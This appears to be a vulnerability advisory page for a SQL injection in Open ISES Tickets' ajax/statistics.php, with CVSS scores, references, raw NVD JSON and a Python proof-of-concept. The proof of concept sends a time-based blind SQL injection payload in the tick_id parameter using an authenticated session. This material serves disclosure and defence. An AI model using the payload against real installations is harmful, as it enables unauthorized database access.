CVE-2026-48240

Description

Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open ISES Tickets < 3.44.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli(url, session_cookie):
    """
    Proof of Concept for CVE-2026-48240
    Tests for SQL Injection in ajax/statistics.php
    """
    target_endpoint = f"{url}/ajax/statistics.php"
    
    # Headers to simulate a browser request
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
    }

    # Payload to trigger SQL Injection (e.g., time-based)
    # Testing if the database sleeps for 5 seconds
    payload = "1' AND SLEEP(5)-- -"

    # Data parameters based on vulnerability description
    data = {
        "tick_id": payload,
        "f_tick_id": "1"
    }

    # Cookies for authentication (Required as per PR:L)
    cookies = {
        "PHPSESSID": session_cookie
    }

    try:
        print(f"[+] Sending payload to {target_endpoint}")
        response = requests.post(target_endpoint, headers=headers, data=data, cookies=cookies, timeout=10)
        
        # Check response time to confirm time-based blind SQLi
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerability Confirmed: SQL Injection detected via response time.")
        else:
            print("[-] Vulnerability not detected or payload incorrect.")
            
    except requests.exceptions.RequestException as e:
        print(f"[Error] Request failed: {e}")

if __name__ == "__main__":
    target = "http://target-openises-ticket-system"
    # Replace with a valid authenticated session ID
    sess_id = "valid_session_id_here" 
    check_sqli(target, sess_id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-48240
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-48240
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-48240/
[4] VulDB https://vuldb.com/cve/CVE-2026-48240
[5] https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
[6] https://github.com/openises/tickets/releases/tag/v3.44.2
[7] https://www.vulncheck.com/advisories/open-ises-tickets-sql-injection-via-ajax-statistics-php-tick-id-and-f-tick-id-parameters

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-48240", "sourceIdentifier": "[email protected]", "published": "2026-05-21T18:16:20.943", "lastModified": "2026-05-21T19:10:12.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff", "source": "[email protected]"}, {"url": "https://github.com/openises/tickets/releases/tag/v3.44.2", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/open-ises-tickets-sql-injection-via-ajax-statistics-php-tick-id-and-f-tick-id-parameters", "source": "[email protected]"}]}}